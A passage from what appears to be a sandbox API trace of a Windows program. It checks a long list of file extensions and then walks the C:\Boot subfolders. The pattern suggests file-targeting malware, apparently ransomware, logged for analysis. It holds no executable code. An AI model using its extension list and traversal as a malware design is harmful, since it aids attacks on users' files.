(lpString1=".cdr", lpString2="") returned 1 [0033.112] lstrlenW (lpString=".cer") returned 4 [0033.112] lstrcmpiW (lpString1=".cer", lpString2="") returned 1 [0033.112] lstrlenW (lpString=".cf") returned 3 [0033.112] lstrcmpiW (lpString1=".cf", lpString2="BCD") returned -1 [0033.112] lstrlenW (lpString=".cfc") returned 4 [0033.112] lstrcmpiW (lpString1=".cfc", lpString2="") returned 1 [0033.112] lstrlenW (lpString=".cfm") returned 4 [0033.112] lstrcmpiW (lpString1=".cfm", lpString2="") returned 1 [0033.112] lstrlenW (lpString=".cfml") returned 5 [0033.112] lstrcmpiW (lpString1=".cfml", lpString2="") returned 1 [0033.112] lstrlenW (lpString=".cfu") returned 4 [0033.112] lstrcmpiW (lpString1=".cfu", lpString2="") returned 1 [0033.112] lstrlenW (lpString=".chm") returned 4 [0033.112] lstrcmpiW (lpString1=".chm", lpString2="") returned 1 [0033.112] lstrlenW (lpString=".cin") returned 4 [0033.112] lstrcmpiW (lpString1=".cin", lpString2="") returned 1 [0033.112] lstrlenW (lpString=".class") returned 6 [0033.112] lstrcmpiW (lpString1=".class", lpString2="") returned 1 [0033.112] lstrlenW (lpString=".clx") returned 4 [0033.112] lstrcmpiW (lpString1=".clx", lpString2="") returned 1 [0033.112] lstrlenW (lpString=".config") returned 7 [0033.112] lstrcmpiW (lpString1=".config", lpString2="") returned 1 [0033.112] lstrlenW (lpString=".cpp") returned 4 [0033.112] lstrcmpiW (lpString1=".cpp", lpString2="") returned 1 [0033.112] lstrlenW (lpString=".cr2") returned 4 [0033.112] lstrcmpiW (lpString1=".cr2", lpString2="") returned 1 [0033.113] lstrlenW (lpString=".crt") returned 4 [0033.113] lstrcmpiW (lpString1=".crt", lpString2="") returned 1 [0033.113] lstrlenW (lpString=".crw") returned 4 [0033.113] lstrcmpiW (lpString1=".crw", lpString2="") returned 1 [0033.113] lstrlenW (lpString=".cs") returned 3 [0033.113] lstrcmpiW (lpString1=".cs", lpString2="BCD") returned -1 [0033.113] lstrlenW (lpString=".css") returned 4 [0033.113] lstrcmpiW (lpString1=".css", lpString2="") returned 1 [0033.113] lstrlenW (lpString=".csv") returned 4 [0033.113] lstrcmpiW (lpString1=".csv", lpString2="") returned 1 [0033.113] lstrlenW (lpString=".cub") returned 4 [0033.113] lstrcmpiW (lpString1=".cub", lpString2="") returned 1 [0033.113] lstrlenW (lpString=".dae") returned 4 [0033.113] lstrcmpiW (lpString1=".dae", lpString2="") returned 1 [0033.113] lstrlenW (lpString=".dat") returned 4 [0033.113] lstrcmpiW (lpString1=".dat", lpString2="") returned 1 [0033.113] lstrlenW (lpString=".db") returned 3 [0033.113] lstrcmpiW (lpString1=".db", lpString2="BCD") returned -1 [0033.113] lstrlenW (lpString=".dbf") returned 4 [0033.113] lstrcmpiW (lpString1=".dbf", lpString2="") returned 1 [0033.113] lstrlenW (lpString=".dbx") returned 4 [0033.113] lstrcmpiW (lpString1=".dbx", lpString2="") returned 1 [0033.113] lstrlenW (lpString=".dc3") returned 4 [0033.113] lstrcmpiW (lpString1=".dc3", lpString2="") returned 1 [0033.113] lstrlenW (lpString=".dcm") returned 4 [0033.113] lstrcmpiW (lpString1=".dcm", lpString2="") returned 1 [0033.113] lstrlenW (lpString=".dcr") returned 4 [0033.113] lstrcmpiW (lpString1=".dcr", lpString2="") returned 1 [0033.113] lstrlenW (lpString=".der") returned 4 [0033.113] lstrcmpiW (lpString1=".der", lpString2="") returned 1 [0033.113] lstrlenW (lpString=".dib") returned 4 [0033.113] lstrcmpiW (lpString1=".dib", lpString2="") returned 1 [0033.113] lstrlenW (lpString=".dic") returned 4 [0033.113] lstrcmpiW (lpString1=".dic", lpString2="") returned 1 [0033.113] lstrlenW (lpString=".dif") returned 4 [0033.113] lstrcmpiW (lpString1=".dif", lpString2="") returned 1 [0033.113] lstrlenW (lpString=".divx") returned 5 [0033.113] lstrcmpiW (lpString1=".divx", lpString2="") returned 1 [0033.114] lstrlenW (lpString=".djvu") returned 5 [0033.114] lstrcmpiW (lpString1=".djvu", lpString2="") returned 1 [0033.114] lstrlenW (lpString=".dng") returned 4 [0033.114] lstrcmpiW (lpString1=".dng", lpString2="") returned 1 [0033.114] lstrlenW (lpString=".doc") returned 4 [0033.114] lstrcmpiW (lpString1=".doc", lpString2="") returned 1 [0033.114] lstrlenW (lpString=".docm") returned 5 [0033.114] lstrcmpiW (lpString1=".docm", lpString2="") returned 1 [0033.114] lstrlenW (lpString=".docx") returned 5 [0033.114] lstrcmpiW (lpString1=".docx", lpString2="") returned 1 [0033.114] lstrlenW (lpString=".dot") returned 4 [0033.114] lstrcmpiW (lpString1=".dot", lpString2="") returned 1 [0033.114] lstrlenW (lpString=".dotm") returned 5 [0033.114] lstrcmpiW (lpString1=".dotm", lpString2="") returned 1 [0033.114] lstrlenW (lpString=".dotx") returned 5 [0033.114] lstrcmpiW (lpString1=".dotx", lpString2="") returned 1 [0033.114] lstrlenW (lpString=".dpx") returned 4 [0033.114] lstrcmpiW (lpString1=".dpx", lpString2="") returned 1 [0033.114] lstrlenW (lpString=".dqy") returned 4 [0033.114] lstrcmpiW (lpString1=".dqy", lpString2="") returned 1 [0033.114] lstrlenW (lpString=".dsn") returned 4 [0033.114] lstrcmpiW (lpString1=".dsn", lpString2="") returned 1 [0033.114] lstrlenW (lpString=".dt") returned 3 [0033.114] lstrcmpiW (lpString1=".dt", lpString2="BCD") returned -1 [0033.114] lstrlenW (lpString=".dtd") returned 4 [0033.114] lstrcmpiW (lpString1=".dtd", lpString2="") returned 1 [0033.114] lstrlenW (lpString=".dwg") returned 4 [0033.114] lstrcmpiW (lpString1=".dwg", lpString2="") returned 1 [0033.114] lstrlenW (lpString=".dwt") returned 4 [0033.114] lstrcmpiW (lpString1=".dwt", lpString2="") returned 1 [0033.114] lstrlenW (lpString=".dx") returned 3 [0033.114] lstrcmpiW (lpString1=".dx", lpString2="BCD") returned -1 [0033.114] lstrlenW (lpString=".dxf") returned 4 [0033.114] lstrcmpiW (lpString1=".dxf", lpString2="") returned 1 [0033.114] lstrlenW (lpString=".edml") returned 5 [0033.114] lstrcmpiW (lpString1=".edml", lpString2="") returned 1 [0033.114] lstrlenW (lpString=".efd") returned 4 [0033.115] lstrcmpiW (lpString1=".efd", lpString2="") returned 1 [0033.115] lstrlenW (lpString=".elf") returned 4 [0033.115] lstrcmpiW (lpString1=".elf", lpString2="") returned 1 [0033.115] lstrlenW (lpString=".emf") returned 4 [0033.115] lstrcmpiW (lpString1=".emf", lpString2="") returned 1 [0033.115] lstrlenW (lpString=".emz") returned 4 [0033.115] lstrcmpiW (lpString1=".emz", lpString2="") returned 1 [0033.115] lstrlenW (lpString=".epf") returned 4 [0033.115] lstrcmpiW (lpString1=".epf", lpString2="") returned 1 [0033.115] lstrlenW (lpString=".eps") returned 4 [0033.115] lstrcmpiW (lpString1=".eps", lpString2="") returned 1 [0033.115] lstrlenW (lpString=".epsf") returned 5 [0033.115] lstrcmpiW (lpString1=".epsf", lpString2="") returned 1 [0033.115] lstrlenW (lpString=".epsp") returned 5 [0033.115] lstrcmpiW (lpString1=".epsp", lpString2="") returned 1 [0033.115] lstrlenW (lpString=".erf") returned 4 [0033.115] lstrcmpiW (lpString1=".erf", lpString2="") returned 1 [0033.115] lstrlenW (lpString=".exr") returned 4 [0033.115] lstrcmpiW (lpString1=".exr", lpString2="") returned 1 [0033.115] lstrlenW (lpString=".f4v") returned 4 [0033.115] lstrcmpiW (lpString1=".f4v", lpString2="") returned 1 [0033.115] lstrlenW (lpString=".fido") returned 5 [0033.115] lstrcmpiW (lpString1=".fido", lpString2="") returned 1 [0033.115] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x3790270 [0033.115] FindFirstFileW (in: lpFileName="C:\\Boot\\cs-CZ\\*", lpFindFileData=0x2f2f808 | out: lpFindFileData=0x2f2f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x629548 [0033.116] FindNextFileW (in: hFindFile=0x629548, lpFindFileData=0x2f2f808 | out: lpFindFileData=0x2f2f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0033.116] FindNextFileW (in: hFindFile=0x629548, lpFindFileData=0x2f2f808 | out: lpFindFileData=0x2f2f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0033.117] FindClose (in: hFindFile=0x629548 | out: hFindFile=0x629548) returned 1 [0033.117] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3790270 | out: hHeap=0x5d0000) returned 1 [0033.117] FindNextFileW (in: hFindFile=0x628500, lpFindFileData=0x2f2fa84 | out: lpFindFileData=0x2f2fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="da-DK", cAlternateFileName="")) returned 1 [0033.117] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x3790270 [0033.117] FindFirstFileW (in: lpFileName="C:\\Boot\\da-DK\\*", lpFindFileData=0x2f2f808 | out: lpFindFileData=0x2f2f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x629548 [0033.118] FindNextFileW (in: hFindFile=0x629548, lpFindFileData=0x2f2f808 | out: lpFindFileData=0x2f2f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0033.118] FindNextFileW (in: hFindFile=0x629548, lpFindFileData=0x2f2f808 | out: lpFindFileData=0x2f2f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0033.118] FindClose (in: hFindFile=0x629548 | out: hFindFile=0x629548) returned 1 [0033.118] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3790270 | out: hHeap=0x5d0000) returned 1 [0033.118] FindNextFileW (in: hFindFile=0x628500, lpFindFileData=0x2f2fa84 | out: lpFindFileData=0x2f2fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="de-DE", cAlternateFileName="")) returned 1 [0033.118] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x3790270 [0033.118] FindFirstFileW (in: lpFileName="C:\\Boot\\de-DE\\*", lpFindFileData=0x2f2f808 | out: lpFindFileData=0x2f2f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x629548 [0033.119] FindNextFileW (in: hFindFile=0x629548, lpFindFileData=0x2f2f808 | out: lpFindFileData=0x2f2f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0033.119] FindNextFileW (in: hFindFile=0x629548, lpFindFileData=0x2f2f808 | out: lpFindFileData=0x2f2f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0033.119] FindClose (in: hFindFile=0x629548 | out: hFindFile=0x629548) returned 1 [0033.119] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3790270 | out: hHeap=0x5d0000) returned 1 [0033.119] FindNextFileW (in: hFindFile=0x628500, lpFindFileData=0x2f2fa84 | out: lpFindFileData=0x2f2fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="el-GR", cAlternateFileName="")) returned 1 [0033.119] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x3790270 [0033.119] FindFirstFileW (in: lpFileName="C:\\Boot\\el-GR\\*", lpFindFileData=0x2f2f808 | out: lpFindFileData=0x2f2f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x629548 [0033.120] FindNextFileW (in: hFindFile=0x629548, lpFindFileData=0x2f2f808 | out: lpFindFileData=0x2f2f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0033.120] FindNextFileW (in: hFindFile=0x629548, lpFindFileData=0x2f2f808 | out: lpFindFileData=0x2f2f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0033.120] FindClose (in: hFindFile=0x629548 | out: hFindFile=0x629548) returned 1 [0033.120] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3790270 | out: hHeap=0x5d0000) returned 1 [0033.120] FindNextFileW (in: hFindFile=0x628500, lpFindFileData=0x2f2fa84 | out: lpFindFileData=0x2f2fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0033.120] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x3790270 [0033.120] FindFirstFileW (in: lpFileName="C:\\Boot\\en-US\\*", lpFindFileData=0x2f2f808 | out: lpFindFileData=0x2f2f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x629548 [0033.121] FindNextFileW (in: hFindFile=0x629548, lpFindFileData=0x2f2f808 | out: lpFindFileData=0x2f2f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0033.121] FindNextFileW (in: hFindFile=0x629548, lpFindFileData=0x2f2f808 | out: lpFindFileData=0x2f2f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x14c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0033.121] FindClose (in: hFindFile=0x629548 | out: hFindFile=0x629548) returned 1 [0033.121] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3790270 | out: hHeap=0x5d0000) returned 1 [0033.121] FindNextFileW (in: hFindFile=0x628500, lpFindFileData=0x2f2fa84 | out: lpFindFileData=0x2f2fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="es-ES", cAlternateFileName="")) returned 1 [0033.121] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x3790270 [0033.121] FindFirstFileW (in: lpFileName="C:\\Boot\\es-ES\\*", lpFindFileData=0x2f2f808 | out: lpFindFileData=0x2f2f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x629548 [0033.122] FindNextFileW (in: hFindFile=0x629548, lpFindFileData=0x2f2f808 | out: lpFindFileData=0x2f2f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0033.122] FindNextFileW (in: hFindFile=0x629548, lpFindFileData=0x2f2f808 | out: lpFindFileData=0x2f2f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0033.122] FindClose (in: hFindFile=0x629548 | out: hFindFile=0x629548) returned 1 [0033.122] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3790270 | out: hHeap=0x5d0000) returned 1 [0033.122] FindNextFileW (in: hFindFile=0x628500, lpFindFileData=0x2f2fa84 | out: lpFindFileData=0x2f2fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="fi-FI", cAlternateFileName="")) returned 1 [0033.122] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x3790270 [0033.122] FindFirstFileW (in: lpFileName="C:\\Boot\\fi-FI\\*", lpFindFileData=0x2f2f808 | out: lpFindFileData=0x2f2f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x629548 [0033.123] FindNextFileW (in: hFindFile=0x629548, lpFindFileData=0x2f2f808 | out: lpFindFileData=0x2f2f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0033.123] FindNextFileW (in: hFindFile=0x629548, lpFindFileData=0x2f2f808 | out: lpFindFileData=0x2f2f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe836d95d, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c40, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0033.123] FindClose (in: hFindFile=0x629548 | out: hFindFile=0x629548) returned 1 [0033.123] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3790270 | out: hHeap=0x5d0000) returned 1 [0033.123] FindNextFileW (in: hFindFile=0x628500, lpFindFileData=0x2f2fa84 | out: lpFindFileData=0x2f2fa84*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Fonts", cAlternateFileName="")) returned 1 [0033.123] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x3790270 [0033.123] FindFirstFileW (in: lpFileName="C:\\Boot\\Fonts\\*", lpFindFileData=0x2f2f808 | out: lpFindFileData=0x2f2f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x629548 [0033.124] FindNextFileW (in: hFindFile=0x629548, lpFindFileData=0x2f2f808 | out: lpFindFileData=0x2f2f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac276640, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0033.124] FindNextFileW (in: hFindFile=0x629548, lpFindFileData=0x2f2f808 | out: lpFindFileData=0x2f2f808*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x64c5ad69, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x385e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="chs_boot.ttf", cAlternateFileName="")) returned 1 [0033.124] FindClose (in: hFindFile=0x629548 | out: hFindFile=0x629548) returned 1 [0033.124] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3790270 | out: hHeap=0x5d0000) returned 1 